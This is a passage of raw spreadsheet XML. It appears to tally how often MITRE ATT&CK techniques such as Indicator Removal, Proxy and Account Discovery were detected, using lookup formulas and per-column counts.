        <v>9</v>
      </c>
      <c r="AO18" s="16">
        <v>1</v>
      </c>
      <c r="AP18" s="394">
        <v>2</v>
      </c>
      <c r="AQ18" s="292">
        <v>0</v>
      </c>
      <c r="AR18" s="322">
        <v>0</v>
      </c>
      <c r="AS18" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT18" s="12">
        <v>0</v>
      </c>
      <c r="AU18" s="13">
        <v>0</v>
      </c>
      <c r="AV18" s="394">
        <v>0</v>
      </c>
      <c r="AW18" s="392">
        <v>4</v>
      </c>
      <c r="AX18" s="392">
        <v>2</v>
      </c>
      <c r="AY18" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (4)</v>
      </c>
      <c r="AZ18" s="4">
        <v>2</v>
      </c>
      <c r="BA18" s="16">
        <v>1</v>
      </c>
      <c r="BB18" s="394">
        <v>1</v>
      </c>
      <c r="BC18" s="292">
        <v>16</v>
      </c>
      <c r="BD18" s="322">
        <v>4</v>
      </c>
      <c r="BE18" s="322" t="str">
        <f t="shared" si="8"/>
        <v>4 (16)</v>
      </c>
      <c r="BF18" s="12">
        <v>4</v>
      </c>
      <c r="BG18" s="13">
        <v>1</v>
      </c>
      <c r="BH18" s="394">
        <v>2</v>
      </c>
      <c r="BI18" s="292">
        <v>4</v>
      </c>
      <c r="BJ18" s="322">
        <v>3</v>
      </c>
      <c r="BK18" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (4)</v>
      </c>
      <c r="BL18" s="12">
        <v>2</v>
      </c>
      <c r="BM18" s="13">
        <v>1</v>
      </c>
      <c r="BN18" s="394">
        <v>2</v>
      </c>
      <c r="BO18" s="292">
        <v>4</v>
      </c>
      <c r="BP18" s="322">
        <v>3</v>
      </c>
      <c r="BQ18" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (4)</v>
      </c>
      <c r="BR18" s="12">
        <v>2</v>
      </c>
      <c r="BS18" s="12">
        <v>0</v>
      </c>
      <c r="BT18" s="13">
        <v>1</v>
      </c>
      <c r="BU18" s="394">
        <v>2</v>
      </c>
      <c r="BV18" s="292">
        <v>1</v>
      </c>
      <c r="BW18" s="322">
        <v>1</v>
      </c>
      <c r="BX18" s="322" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY18" s="12">
        <v>1</v>
      </c>
      <c r="BZ18" s="13">
        <v>1</v>
      </c>
      <c r="CA18" s="394">
        <v>1</v>
      </c>
      <c r="CB18" s="292">
        <v>12</v>
      </c>
      <c r="CC18" s="322">
        <v>1</v>
      </c>
      <c r="CD18" s="322" t="str">
        <f t="shared" si="12"/>
        <v>1 (12)</v>
      </c>
      <c r="CE18" s="12">
        <v>0</v>
      </c>
      <c r="CF18" s="12">
        <v>1</v>
      </c>
      <c r="CG18" s="13">
        <v>1</v>
      </c>
      <c r="CH18" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="19" spans="1:86" ht="15" customHeight="1">
      <c r="A19" s="4">
        <f t="shared" si="13"/>
        <v>17</v>
      </c>
      <c r="B19" s="4" t="str">
        <f>IFERROR(VLOOKUP(A19,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1070</v>
      </c>
      <c r="C19" s="493" t="str">
        <f>IFERROR(VLOOKUP(B19,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Indicator Removal</v>
      </c>
      <c r="D19" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B19)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E19" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B19,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F19" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G19" s="292">
        <v>0</v>
      </c>
      <c r="H19" s="322">
        <v>0</v>
      </c>
      <c r="I19" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J19" s="12">
        <v>0</v>
      </c>
      <c r="K19" s="13">
        <v>0</v>
      </c>
      <c r="L19" s="394">
        <v>0</v>
      </c>
      <c r="M19" s="322">
        <v>0</v>
      </c>
      <c r="N19" s="322">
        <v>0</v>
      </c>
      <c r="O19" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P19" s="12">
        <v>0</v>
      </c>
      <c r="Q19" s="13">
        <v>0</v>
      </c>
      <c r="R19" s="394">
        <v>0</v>
      </c>
      <c r="S19" s="409">
        <v>0</v>
      </c>
      <c r="T19" s="4">
        <v>0</v>
      </c>
      <c r="U19" s="322" t="str">
        <f t="shared" si="2"/>
        <v>0 (0)</v>
      </c>
      <c r="V19" s="4">
        <v>0</v>
      </c>
      <c r="W19" s="13">
        <v>0</v>
      </c>
      <c r="X19" s="394">
        <v>0</v>
      </c>
      <c r="Y19" s="392">
        <v>0</v>
      </c>
      <c r="Z19" s="392">
        <v>0</v>
      </c>
      <c r="AA19" s="322" t="str">
        <f t="shared" si="3"/>
        <v>0 (0)</v>
      </c>
      <c r="AB19" s="392">
        <v>0</v>
      </c>
      <c r="AC19" s="16">
        <v>0</v>
      </c>
      <c r="AD19" s="394">
        <v>0</v>
      </c>
      <c r="AE19" s="392">
        <v>0</v>
      </c>
      <c r="AF19" s="392">
        <v>0</v>
      </c>
      <c r="AG19" s="322" t="str">
        <f t="shared" si="4"/>
        <v>0 (0)</v>
      </c>
      <c r="AH19" s="392">
        <v>0</v>
      </c>
      <c r="AI19" s="16">
        <v>0</v>
      </c>
      <c r="AJ19" s="394">
        <v>0</v>
      </c>
      <c r="AK19" s="392">
        <v>0</v>
      </c>
      <c r="AL19" s="392">
        <v>0</v>
      </c>
      <c r="AM19" s="322" t="str">
        <f t="shared" si="5"/>
        <v>0 (0)</v>
      </c>
      <c r="AN19" s="392">
        <v>0</v>
      </c>
      <c r="AO19" s="16">
        <v>0</v>
      </c>
      <c r="AP19" s="394">
        <v>0</v>
      </c>
      <c r="AQ19" s="292">
        <v>0</v>
      </c>
      <c r="AR19" s="322">
        <v>0</v>
      </c>
      <c r="AS19" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT19" s="12">
        <v>0</v>
      </c>
      <c r="AU19" s="13">
        <v>0</v>
      </c>
      <c r="AV19" s="394">
        <v>0</v>
      </c>
      <c r="AW19" s="392">
        <v>0</v>
      </c>
      <c r="AX19" s="392">
        <v>0</v>
      </c>
      <c r="AY19" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ19" s="4">
        <v>0</v>
      </c>
      <c r="BA19" s="16">
        <v>0</v>
      </c>
      <c r="BB19" s="394">
        <v>0</v>
      </c>
      <c r="BC19" s="292">
        <v>0</v>
      </c>
      <c r="BD19" s="322">
        <v>0</v>
      </c>
      <c r="BE19" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF19" s="12">
        <v>0</v>
      </c>
      <c r="BG19" s="13">
        <v>0</v>
      </c>
      <c r="BH19" s="394">
        <v>0</v>
      </c>
      <c r="BI19" s="292">
        <v>0</v>
      </c>
      <c r="BJ19" s="322">
        <v>0</v>
      </c>
      <c r="BK19" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL19" s="12">
        <v>0</v>
      </c>
      <c r="BM19" s="13">
        <v>0</v>
      </c>
      <c r="BN19" s="394">
        <v>0</v>
      </c>
      <c r="BO19" s="292">
        <v>3</v>
      </c>
      <c r="BP19" s="322">
        <v>3</v>
      </c>
      <c r="BQ19" s="322" t="str">
        <f t="shared" si="10"/>
        <v>3 (3)</v>
      </c>
      <c r="BR19" s="12">
        <v>0</v>
      </c>
      <c r="BS19" s="12">
        <v>3</v>
      </c>
      <c r="BT19" s="13">
        <v>1</v>
      </c>
      <c r="BU19" s="394">
        <v>1</v>
      </c>
      <c r="BV19" s="292">
        <v>0</v>
      </c>
      <c r="BW19" s="322">
        <v>0</v>
      </c>
      <c r="BX19" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY19" s="12">
        <v>0</v>
      </c>
      <c r="BZ19" s="13">
        <v>0</v>
      </c>
      <c r="CA19" s="394">
        <v>0</v>
      </c>
      <c r="CB19" s="292">
        <v>0</v>
      </c>
      <c r="CC19" s="322">
        <v>0</v>
      </c>
      <c r="CD19" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE19" s="12">
        <v>0</v>
      </c>
      <c r="CF19" s="12">
        <v>0</v>
      </c>
      <c r="CG19" s="13">
        <v>0</v>
      </c>
      <c r="CH19" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:86" ht="15" customHeight="1">
      <c r="A20" s="4">
        <f t="shared" si="13"/>
        <v>18</v>
      </c>
      <c r="B20" s="4" t="str">
        <f>IFERROR(VLOOKUP(A20,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1071</v>
      </c>
      <c r="C20" s="493" t="str">
        <f>IFERROR(VLOOKUP(B20,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Application Layer Protocol</v>
      </c>
      <c r="D20" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B20)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E20" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B20,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>198</v>
      </c>
      <c r="F20" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (198)</v>
      </c>
      <c r="G20" s="292">
        <v>204</v>
      </c>
      <c r="H20" s="322">
        <v>10</v>
      </c>
      <c r="I20" s="322" t="str">
        <f t="shared" si="0"/>
        <v>10 (204)</v>
      </c>
      <c r="J20" s="12">
        <v>1</v>
      </c>
      <c r="K20" s="13">
        <v>1</v>
      </c>
      <c r="L20" s="394">
        <v>10</v>
      </c>
      <c r="M20" s="322">
        <v>0</v>
      </c>
      <c r="N20" s="322">
        <v>0</v>
      </c>
      <c r="O20" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P20" s="12">
        <v>0</v>
      </c>
      <c r="Q20" s="13">
        <v>0</v>
      </c>
      <c r="R20" s="394">
        <v>0</v>
      </c>
      <c r="S20" s="409">
        <v>204</v>
      </c>
      <c r="T20" s="4">
        <v>10</v>
      </c>
      <c r="U20" s="322" t="str">
        <f t="shared" si="2"/>
        <v>10 (204)</v>
      </c>
      <c r="V20" s="4">
        <v>1</v>
      </c>
      <c r="W20" s="13">
        <v>1</v>
      </c>
      <c r="X20" s="394">
        <v>10</v>
      </c>
      <c r="Y20" s="392">
        <v>205</v>
      </c>
      <c r="Z20" s="392">
        <v>11</v>
      </c>
      <c r="AA20" s="322" t="str">
        <f t="shared" si="3"/>
        <v>11 (205)</v>
      </c>
      <c r="AB20" s="392">
        <v>2</v>
      </c>
      <c r="AC20" s="16">
        <v>1</v>
      </c>
      <c r="AD20" s="394">
        <v>11</v>
      </c>
      <c r="AE20" s="392">
        <v>2</v>
      </c>
      <c r="AF20" s="392">
        <v>2</v>
      </c>
      <c r="AG20" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (2)</v>
      </c>
      <c r="AH20" s="392">
        <v>1</v>
      </c>
      <c r="AI20" s="16">
        <v>1</v>
      </c>
      <c r="AJ20" s="394">
        <v>2</v>
      </c>
      <c r="AK20" s="392">
        <v>207</v>
      </c>
      <c r="AL20" s="392">
        <v>13</v>
      </c>
      <c r="AM20" s="322" t="str">
        <f t="shared" si="5"/>
        <v>13 (207)</v>
      </c>
      <c r="AN20" s="392">
        <v>3</v>
      </c>
      <c r="AO20" s="16">
        <v>1</v>
      </c>
      <c r="AP20" s="394">
        <v>11</v>
      </c>
      <c r="AQ20" s="292">
        <v>0</v>
      </c>
      <c r="AR20" s="322">
        <v>0</v>
      </c>
      <c r="AS20" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT20" s="12">
        <v>0</v>
      </c>
      <c r="AU20" s="13">
        <v>0</v>
      </c>
      <c r="AV20" s="394">
        <v>0</v>
      </c>
      <c r="AW20" s="392">
        <v>0</v>
      </c>
      <c r="AX20" s="392">
        <v>0</v>
      </c>
      <c r="AY20" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ20" s="4">
        <v>0</v>
      </c>
      <c r="BA20" s="16">
        <v>0</v>
      </c>
      <c r="BB20" s="394">
        <v>0</v>
      </c>
      <c r="BC20" s="292">
        <v>204</v>
      </c>
      <c r="BD20" s="322">
        <v>10</v>
      </c>
      <c r="BE20" s="322" t="str">
        <f t="shared" si="8"/>
        <v>10 (204)</v>
      </c>
      <c r="BF20" s="12">
        <v>1</v>
      </c>
      <c r="BG20" s="13">
        <v>1</v>
      </c>
      <c r="BH20" s="394">
        <v>10</v>
      </c>
      <c r="BI20" s="292">
        <v>0</v>
      </c>
      <c r="BJ20" s="322">
        <v>0</v>
      </c>
      <c r="BK20" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL20" s="12">
        <v>0</v>
      </c>
      <c r="BM20" s="13">
        <v>0</v>
      </c>
      <c r="BN20" s="394">
        <v>0</v>
      </c>
      <c r="BO20" s="292">
        <v>198</v>
      </c>
      <c r="BP20" s="322">
        <v>198</v>
      </c>
      <c r="BQ20" s="322" t="str">
        <f t="shared" si="10"/>
        <v>198 (198)</v>
      </c>
      <c r="BR20" s="12">
        <v>0</v>
      </c>
      <c r="BS20" s="12">
        <v>2</v>
      </c>
      <c r="BT20" s="13">
        <v>1</v>
      </c>
      <c r="BU20" s="394">
        <v>198</v>
      </c>
      <c r="BV20" s="292">
        <v>0</v>
      </c>
      <c r="BW20" s="322">
        <v>0</v>
      </c>
      <c r="BX20" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY20" s="12">
        <v>0</v>
      </c>
      <c r="BZ20" s="13">
        <v>0</v>
      </c>
      <c r="CA20" s="394">
        <v>0</v>
      </c>
      <c r="CB20" s="292">
        <v>0</v>
      </c>
      <c r="CC20" s="322">
        <v>0</v>
      </c>
      <c r="CD20" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE20" s="12">
        <v>0</v>
      </c>
      <c r="CF20" s="12">
        <v>0</v>
      </c>
      <c r="CG20" s="13">
        <v>0</v>
      </c>
      <c r="CH20" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:86" ht="15" customHeight="1">
      <c r="A21" s="4">
        <f t="shared" si="13"/>
        <v>19</v>
      </c>
      <c r="B21" s="4" t="str">
        <f>IFERROR(VLOOKUP(A21,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1087</v>
      </c>
      <c r="C21" s="493" t="str">
        <f>IFERROR(VLOOKUP(B21,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Account Discovery</v>
      </c>
      <c r="D21" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B21)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E21" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B21,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F21" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G21" s="292">
        <v>0</v>
      </c>
      <c r="H21" s="322">
        <v>0</v>
      </c>
      <c r="I21" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J21" s="12">
        <v>0</v>
      </c>
      <c r="K21" s="13">
        <v>0</v>
      </c>
      <c r="L21" s="394">
        <v>0</v>
      </c>
      <c r="M21" s="322">
        <v>8</v>
      </c>
      <c r="N21" s="322">
        <v>2</v>
      </c>
      <c r="O21" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (8)</v>
      </c>
      <c r="P21" s="12">
        <v>2</v>
      </c>
      <c r="Q21" s="13">
        <v>1</v>
      </c>
      <c r="R21" s="394">
        <v>2</v>
      </c>
      <c r="S21" s="409">
        <v>8</v>
      </c>
      <c r="T21" s="4">
        <v>2</v>
      </c>
      <c r="U21" s="322" t="str">
        <f t="shared" si="2"/>
        <v>2 (8)</v>
      </c>
      <c r="V21" s="4">
        <v>2</v>
      </c>
      <c r="W21" s="13">
        <v>1</v>
      </c>
      <c r="X21" s="394">
        <v>2</v>
      </c>
      <c r="Y21" s="392">
        <v>17</v>
      </c>
      <c r="Z21" s="392">
        <v>7</v>
      </c>
      <c r="AA21" s="322" t="str">
        <f t="shared" si="3"/>
        <v>7 (17)</v>
      </c>
      <c r="AB21" s="392">
        <v>6</v>
      </c>
      <c r="AC21" s="16">
        <v>1</v>
      </c>
      <c r="AD21" s="394">
        <v>2</v>
      </c>
      <c r="AE21" s="392">
        <v>18</v>
      </c>
      <c r="AF21" s="392">
        <v>5</v>
      </c>
      <c r="AG21" s="322" t="str">
        <f t="shared" si="4"/>
        <v>5 (18)</v>
      </c>
      <c r="AH21" s="392">
        <v>5</v>
      </c>
      <c r="AI21" s="16">
        <v>1</v>
      </c>
      <c r="AJ21" s="394">
        <v>2</v>
      </c>
      <c r="AK21" s="392">
        <v>35</v>
      </c>
      <c r="AL21" s="392">
        <v>12</v>
      </c>
      <c r="AM21" s="322" t="str">
        <f t="shared" si="5"/>
        <v>12 (35)</v>
      </c>
      <c r="AN21" s="392">
        <v>11</v>
      </c>
      <c r="AO21" s="16">
        <v>1</v>
      </c>
      <c r="AP21" s="394">
        <v>2</v>
      </c>
      <c r="AQ21" s="292">
        <v>0</v>
      </c>
      <c r="AR21" s="322">
        <v>0</v>
      </c>
      <c r="AS21" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT21" s="12">
        <v>0</v>
      </c>
      <c r="AU21" s="13">
        <v>0</v>
      </c>
      <c r="AV21" s="394">
        <v>0</v>
      </c>
      <c r="AW21" s="392">
        <v>3</v>
      </c>
      <c r="AX21" s="392">
        <v>2</v>
      </c>
      <c r="AY21" s="322" t="str">
        <f t="shared" si="7"/>
        <v>2 (3)</v>
      </c>
      <c r="AZ21" s="4">
        <v>2</v>
      </c>
      <c r="BA21" s="16">
        <v>1</v>
      </c>
      <c r="BB21" s="394">
        <v>1</v>
      </c>
      <c r="BC21" s="292">
        <v>11</v>
      </c>
      <c r="BD21" s="322">
        <v>4</v>
      </c>
      <c r="BE21" s="322" t="str">
        <f t="shared" si="8"/>
        <v>4 (11)</v>
      </c>
      <c r="BF21" s="12">
        <v>4</v>
      </c>
      <c r="BG21" s="13">
        <v>1</v>
      </c>
      <c r="BH21" s="394">
        <v>2</v>
      </c>
      <c r="BI21" s="292">
        <v>2</v>
      </c>
      <c r="BJ21" s="322">
        <v>2</v>
      </c>
      <c r="BK21" s="322" t="str">
        <f t="shared" si="9"/>
        <v>2 (2)</v>
      </c>
      <c r="BL21" s="12">
        <v>1</v>
      </c>
      <c r="BM21" s="13">
        <v>1</v>
      </c>
      <c r="BN21" s="394">
        <v>2</v>
      </c>
      <c r="BO21" s="292">
        <v>2</v>
      </c>
      <c r="BP21" s="322">
        <v>2</v>
      </c>
      <c r="BQ21" s="322" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR21" s="12">
        <v>1</v>
      </c>
      <c r="BS21" s="12">
        <v>0</v>
      </c>
      <c r="BT21" s="13">
        <v>1</v>
      </c>
      <c r="BU21" s="394">
        <v>2</v>
      </c>
      <c r="BV21" s="292">
        <v>0</v>
      </c>
      <c r="BW21" s="322">
        <v>0</v>
      </c>
      <c r="BX21" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY21" s="12">
        <v>0</v>
      </c>
      <c r="BZ21" s="13">
        <v>0</v>
      </c>
      <c r="CA21" s="394">
        <v>0</v>
      </c>
      <c r="CB21" s="292">
        <v>0</v>
      </c>
      <c r="CC21" s="322">
        <v>0</v>
      </c>
      <c r="CD21" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE21" s="12">
        <v>0</v>
      </c>
      <c r="CF21" s="12">
        <v>0</v>
      </c>
      <c r="CG21" s="13">
        <v>0</v>
      </c>
      <c r="CH21" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:86" ht="15" customHeight="1">
      <c r="A22" s="4">
        <f t="shared" si="13"/>
        <v>20</v>
      </c>
      <c r="B22" s="4" t="str">
        <f>IFERROR(VLOOKUP(A22,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1090</v>
      </c>
      <c r="C22" s="493" t="str">
        <f>IFERROR(VLOOKUP(B22,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Proxy</v>
      </c>
      <c r="D22" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B22)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E22" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B22,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>23</v>
      </c>
      <c r="F22" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (23)</v>
      </c>
      <c r="G22" s="292">
        <v>0</v>
      </c>
      <c r="H22" s="322">
        <v>0</v>
      </c>
      <c r="I22" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J22" s="12">
        <v>0</v>
      </c>
      <c r="K22" s="13">
        <v>0</v>
      </c>
      <c r="L22" s="394">
        <v>0</v>
      </c>
      <c r="M22" s="322">
        <v>6</v>
      </c>
      <c r="N22" s="322">
        <v>6</v>
      </c>
      <c r="O22" s="322" t="str">
        <f t="shared" si="1"/>
        <v>6 (6)</v>
      </c>
      <c r="P22" s="12">
        <v>3</v>
      </c>
      <c r="Q22" s="13">
        <v>1</v>
      </c>
      <c r="R22" s="394">
        <v>2</v>
      </c>
      <c r="S22" s="409">
        <v>6</v>
      </c>
      <c r="T22" s="4">
        <v>6</v>
      </c>
      <c r="U22" s="322" t="str">
        <f t="shared" si="2"/>
        <v>6 (6)</v>
      </c>
      <c r="V22" s="4">
        <v>3</v>
      </c>
      <c r="W22" s="13">
        <v>1</v>
      </c>
      <c r="X22" s="394">
        <v>2</v>
      </c>
      <c r="Y22" s="392">
        <v>41</v>
      </c>
      <c r="Z22" s="392">
        <v>15</v>
      </c>
      <c r="AA22" s="322" t="str">
        <f t="shared" si="3"/>
        <v>15 (41)</v>
      </c>
      <c r="AB22" s="392">
        <v>1</v>
      </c>
      <c r="AC22" s="16">
        <v>1</v>
      </c>
      <c r="AD22" s="394">
        <v>15</v>
      </c>
      <c r="AE22" s="392">
        <v>6</v>
      </c>
      <c r="AF22" s="392">
        <v>6</v>
      </c>
      <c r="AG22" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (6)</v>
      </c>
      <c r="AH22" s="392">
        <v>3</v>
      </c>
      <c r="AI22" s="16">
        <v>1</v>
      </c>
      <c r="AJ22" s="394">
        <v>2</v>
      </c>
      <c r="AK22" s="392">
        <v>47</v>
      </c>
      <c r="AL22" s="392">
        <v>21</v>
      </c>
      <c r="AM22" s="322" t="str">
        <f t="shared" si="5"/>
        <v>21 (47)</v>
      </c>
      <c r="AN22" s="392">
        <v>4</v>
      </c>
      <c r="AO22" s="16">
        <v>1</v>
      </c>
      <c r="AP22" s="394">
        <v>15</v>
      </c>
      <c r="AQ22" s="292">
        <v>0</v>
      </c>
      <c r="AR22" s="322">
        <v>0</v>
      </c>
      <c r="AS22" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT22" s="12">
        <v>0</v>
      </c>
      <c r="AU22" s="13">
        <v>0</v>
      </c>
      <c r="AV22" s="394">
        <v>0</v>
      </c>
      <c r="AW22" s="392">
        <v>0</v>
      </c>
      <c r="AX22" s="392">
        <v>0</v>
      </c>
      <c r="AY22" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ22" s="4">
        <v>0</v>
      </c>
      <c r="BA22" s="16">
        <v>0</v>
      </c>
      <c r="BB22" s="394">
        <v>0</v>
      </c>
      <c r="BC22" s="292">
        <v>6</v>
      </c>
      <c r="BD22" s="322">
        <v>6</v>
      </c>
      <c r="BE22" s="322" t="str">
        <f t="shared" si="8"/>
        <v>6 (6)</v>
      </c>
      <c r="BF22" s="12">
        <v>3</v>
      </c>
      <c r="BG22" s="13">
        <v>1</v>
      </c>
      <c r="BH22" s="394">
        <v>2</v>
      </c>
      <c r="BI22" s="292">
        <v>7</v>
      </c>
      <c r="BJ22" s="322">
        <v>4</v>
      </c>
      <c r="BK22" s="322" t="str">
        <f t="shared" si="9"/>
        <v>4 (7)</v>
      </c>
      <c r="BL22" s="12">
        <v>1</v>
      </c>
      <c r="BM22" s="13">
        <v>1</v>
      </c>
      <c r="BN22" s="394">
        <v>4</v>
      </c>
      <c r="BO22" s="292">
        <v>56</v>
      </c>
      <c r="BP22" s="322">
        <v>24</v>
      </c>
      <c r="BQ22" s="322" t="str">
        <f t="shared" si="10"/>
        <v>24 (56)</v>
      </c>
      <c r="BR22" s="12">
        <v>1</v>
      </c>
      <c r="BS22" s="12">
        <v>4</v>
      </c>
      <c r="BT22" s="13">
        <v>1</v>
      </c>
      <c r="BU22" s="394">
        <v>20</v>
      </c>
      <c r="BV22" s="292">
        <v>6</v>
      </c>
      <c r="BW22" s="322">
        <v>4</v>
      </c>
      <c r="BX22" s="322" t="str">
        <f t="shared" si="11"/>
        <v>4 (6)</v>
      </c>
      <c r="BY22" s="12">
        <v>1</v>
      </c>
      <c r="BZ22" s="13">
        <v>1</v>
      </c>
      <c r="CA22" s="394">
        <v>4</v>
      </c>
      <c r="CB22" s="292">
        <v>47</v>
      </c>
      <c r="CC22" s="322">
        <v>15</v>
      </c>
      <c r="CD22" s="322" t="str">
        <f t="shared" si="12"/>
        <v>15 (47)</v>
      </c>
      <c r="CE22" s="12">
        <v>0</v>
      </c>
      <c r="CF22" s="12">
        <v>1</v>
      </c>
      <c r="CG22" s="13">
        <v>1</v>
      </c>
      <c r="CH22" s="394">
        <v>15</v>
      </c>
    </row>
    <row r="23" spans="1:86" ht="15" customHeight="1">
      <c r="A23" s="4">
        <f t="shared" si="13"/>
        <v>21</v>
      </c>
      <c r="B23" s="4" t="str">
        <f>IFERROR(VLOOKUP(A23,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1095</v>
      </c>
      <c r="C23" s="493" t="str">
        <f>IFERROR(VLOOKUP(B23,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Application Layer Protocol</v>
      </c>
      <c r="D23" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B23)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E23" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B23,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>2</v>
      </c>
      <c r="F23" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (2)</v>
      </c>
      <c r="G23" s="292">
        <v>0</v>
      </c>
      <c r="H23" s="322">
        <v>0</v>
      </c>
      <c r="I23" s="322" t="str">
        <f t="shared" si="0"/>
        <v>0 (0)</v>
      </c>
      <c r="J23" s="12">
        <v>0</v>
      </c>
      <c r="K23" s="13">
        <v>0</v>
      </c>
      <c r="L23" s="394">
        <v>0</v>
      </c>
      <c r="M23" s="322">
        <v>1</v>
      </c>
      <c r="N23" s="322">
        <v>1</v>
      </c>
      <c r="O23" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P23" s="12">
        <v>1</v>
      </c>
      <c r="Q23" s="13">
        <v>1</v>
      </c>
      <c r="R23" s="394">
        <v>1</v>
      </c>
      <c r="S23" s="409">
        <v>1</v>
      </c>
      <c r="T23" s="4">
        <v>1</v>
      </c>
      <c r="U23" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (1)</v>
      </c>
      <c r="V23" s="4">
        <v>1</v>
      </c>
      <c r="W23" s="13">
        <v>1</v>
      </c>
      <c r="X23" s="394">
        <v>1</v>
      </c>
      <c r="Y23" s="392">
        <v>13</v>
      </c>
      <c r="Z23" s="392">
        <v>4</v>
      </c>
      <c r="AA23" s="322" t="str">
        <f t="shared" si="3"/>
        <v>4 (13)</v>
      </c>
      <c r="AB23" s="392">
